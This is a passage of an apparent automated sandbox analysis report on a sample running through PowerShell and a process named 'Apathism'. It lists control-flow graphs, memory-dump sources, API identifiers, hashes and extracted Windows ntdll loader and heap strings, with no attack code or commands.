                          • Opcode Fuzzy Hash: 2dc2197665f12084b55a84daea6d6c79f4f5ab6fc386af26ce29d7c13c29a01a
                          • Instruction Fuzzy Hash: 437113B1B0021AEFDB549BF9D8007AEB7E1EF85211F14826AD856EB241FB31C945C7E1
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:

                          Execution Graph

                          Execution Coverage:0%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:40%
                          Total number of Nodes:5
                          Total number of Limit Nodes:1
                          execution_graph 78027 22372c70 LdrInitializeThunk 78030 22372c00 78032 22372c0a 78030->78032 78033 22372c1f LdrInitializeThunk 78032->78033 78034 22372c11 78032->78034

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4 22372c70-22372c7c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5 22372df0-22372dfc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 6 223735c0-223735cc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 22372c0a-22372c0f 1 22372c11-22372c18 0->1 2 22372c1f-22372c26 LdrInitializeThunk 0->2
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2160512332

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          • Thread is in a state in which it cannot own a critical section, xrefs: 223A5543
                          • 8, xrefs: 223A52E3
                          • corrupted critical section, xrefs: 223A54C2
                          • double initialized or corrupted critical section, xrefs: 223A5508
                          • Critical section address, xrefs: 223A5425, 223A54BC, 223A5534
                          • Critical section address., xrefs: 223A5502
                          • Critical section debug info address, xrefs: 223A541F, 223A552E
                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 223A540A, 223A5496, 223A5519
                          • Address of the debug info found in the active list., xrefs: 223A54AE, 223A54FA
                          • undeleted critical section in freed memory, xrefs: 223A542B
                          • Thread identifier, xrefs: 223A553A
                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 223A54E2
                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 223A54CE
                          • Invalid debug info address of this critical section, xrefs: 223A54B6
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                          • API String ID: 0-2368682639

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                          • API String ID: 3446177414-1700792311
                          Strings
                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 223A2506
                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 223A2409
                          • @, xrefs: 223A259B
                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 223A2602
                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 223A24C0
                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 223A25EB
                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 223A2624
                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 223A22E4
                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 223A2498
                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 223A261F
                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 223A2412
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                          • API String ID: 0-4009184096
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                          • API String ID: 0-2515994595
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V0"${
                          • API String ID: 0-3979271505
                          Strings
                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 223B8A3D
                          • VerifierFlags, xrefs: 223B8C50
                          • VerifierDlls, xrefs: 223B8CBD
                          • AVRF: -*- final list of providers -*- , xrefs: 223B8B8F
                          • HandleTraces, xrefs: 223B8C8F
                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 223B8A67
                          • VerifierDebug, xrefs: 223B8CA5
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                          • API String ID: 0-3223716464
                          Strings
                          • LdrpDynamicShimModule, xrefs: 2239A998
                          • minkernel\ntdll\ldrinit.c, xrefs: 2239A9A2
                          • TG0", xrefs: 22352462
                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2239A992
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG0"$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1116696979
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-792281065
                          Strings
                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 223A219F
                          • SXS: %s() passed the empty activation context, xrefs: 223A2165
                          • RtlGetAssemblyStorageRoot, xrefs: 223A2160, 223A219A, 223A21BA
                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 223A2180
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 223A21BF
                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 223A2178
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                          • API String ID: 0-861424205
                          Strings
                          • LdrpInitializeImportRedirection, xrefs: 223A8177, 223A81EB
                          • minkernel\ntdll\ldrredirect.c, xrefs: 223A8181, 223A81F5
                          • minkernel\ntdll\ldrinit.c, xrefs: 2236C6C3
                          • LdrpInitializeProcess, xrefs: 2236C6C4
                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 223A81E5
                          • Loading import redirection DLL: '%wZ', xrefs: 223A8170
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-475462383
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-4253913091
                          APIs
                          Strings
                          • LdrpCheckModule, xrefs: 2239A117
                          • Failed to allocated memory for shimmed module list, xrefs: 2239A10F
                          • minkernel\ntdll\ldrinit.c, xrefs: 2239A121
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-161242083
                          APIs
                          Strings
                          • LdrpInitializePerUserWindowsDirectory, xrefs: 223A82DE
                          • Failed to reallocate the system dirs string !, xrefs: 223A82D7
                          • minkernel\ntdll\ldrinit.c, xrefs: 223A82E8
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-1783798831
                          APIs
                          Strings
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 223B4888
                          • minkernel\ntdll\ldrredirect.c, xrefs: 223B4899
                          • LdrpCheckRedirection, xrefs: 223B488F
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API String ID: 3446177414-3154609507
                          APIs
                            • Part of subcall function 22372DF0: LdrInitializeThunk.NTDLL ref: 22372DFA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22370BA3
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22370BB6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22370D60
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22370D74
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                          • String ID:
                          • API String ID: 1404860816-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          APIs
                          Strings
                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2233063D
                          • kLsE, xrefs: 22330540
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                          • API String ID: 3446177414-2547482624
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                          • API String ID: 0-379654539
                          Strings
                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2236855E
                          • minkernel\ntdll\ldrinit.c, xrefs: 22368421
                          • LdrpInitializeProcess, xrefs: 22368422
                          • @, xrefs: 22368591
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1918872054
                          Strings
                          • .Local, xrefs: 223628D8
                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 223A21D9, 223A22B1
                          • SXS: %s() passed the empty activation context, xrefs: 223A21DE
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 223A22B6
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                          • API String ID: 0-1239276146
                          Strings
                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 223A342A
                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 223A3456
                          • RtlDeactivateActivationContext, xrefs: 223A3425, 223A3432, 223A3451
                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 223A3437
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                          • API String ID: 0-1245972979
                          Strings
                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2239106B
                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 223910AE
                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 22390FE5
                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 22391028
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                          • API String ID: 0-1468400865
                          Strings
                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2234327D
                          • HEAP[%wZ]: , xrefs: 22343255
                          • HEAP: , xrefs: 22343264
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                          • API String ID: 0-617086771
                          Similarity
                          • API ID:
                          • String ID: $@
                          • API String ID: 0-1077428164
                          Similarity
                          • API ID:
                          • String ID: FilterFullPath$UseFilter$\??\
                          • API String ID: 0-2779062949
                          Similarity
                          • API ID:
                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-1334570610
                          Strings
                          • @, xrefs: 223EC1F1
                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 223EC1C5
                          • PreferredUILanguages, xrefs: 223EC212
                          Similarity
                          • API ID:
                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                          • API String ID: 0-2968386058
                          Similarity
                          • API ID:
                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                          • API String ID: 0-1373925480
                          Strings
                          • PS0", xrefs: 2233A348
                          • RtlpResUltimateFallbackInfo Enter, xrefs: 2233A2FB
                          • RtlpResUltimateFallbackInfo Exit, xrefs: 2233A309
                          Similarity
                          • API ID:
                          • String ID: PS0"$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                          • API String ID: 0-470575045
                          Similarity
                          • API ID:
                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-2558761708
                          Strings
                          • LdrpInitializationFailure, xrefs: 223B20FA
                          • Process initialization failed with status 0x%08lx, xrefs: 223B20F3
                          • minkernel\ntdll\ldrinit.c, xrefs: 223B2104
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2986994758
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: #%u
                          • API String ID: 48624451-232158463
                          Similarity
                          • API ID:
                          • String ID: \B"
                          • API String ID: 0-1507244737
                          Strings
                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 223B895E
                          Similarity
                          • API ID:
                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                          • API String ID: 0-702105204
                          Strings
                          • LdrResSearchResource Enter, xrefs: 2233AA13
                          • LdrResSearchResource Exit, xrefs: 2233AA25
                          Similarity
                          • API ID:
                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                          • API String ID: 0-4066393604
                          Similarity
                          • API ID:
                          • String ID: `$`
                          • API String ID: 0-197956300
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API String ID: 2994545307-634100481
                          Similarity
                          • API ID:
                          • String ID: @$MUI
                          • API String ID: 0-17815947
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Cleanup Group$Threadpool!
                          • API String ID: 2994545307-4008356553
                          Similarity
                          • API ID:
                          • String ID: MUI
                          • API String ID: 0-1339004836
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          APIs
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          APIs
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          APIs
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          APIs
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID: GlobalTags
                          • API String ID: 0-1106856819
                          Strings
                          Similarity
                          • API ID:
                          • String ID: .mui
                          • API String ID: 0-1199573805
                          Strings
                          Similarity
                          • API ID:
                          • String ID: PhB"
                          • API String ID: 0-3147966021
                          Strings
                          Similarity
                          • API ID:
                          • String ID: EXT-
                          • API String ID: 0-1948896318
                          Strings
                          Similarity
                          • API ID:
                          • String ID: pfB"
                          • API String ID: 0-286172273
                          Strings
                          Similarity
                          • API ID:
                          • String ID: BinaryHash
                          • API String ID: 0-2202222882
                          Strings
                          Similarity
                          • API ID:
                          • String ID: @3B"
                          • API String ID: 0-2337452171
                          Strings
                          Similarity
                          • API ID:
                          • String ID: #
                          • API String ID: 0-1885708031
                          Strings
                          Similarity
                          • API ID:
                          • String ID: BinaryName
                          • API String ID: 0-215506332
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                          • Instruction ID: 9d53361f3a1df4332682f13e5770cf56fd871d8a1de81c60f1efb700fa5def4a
                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                          • Instruction Fuzzy Hash: 73B16474E017049FDB24CF95CA40EABB7B9FF84308F90446DAA429BB95DA34ED46CB10
                          Memory Dump Source
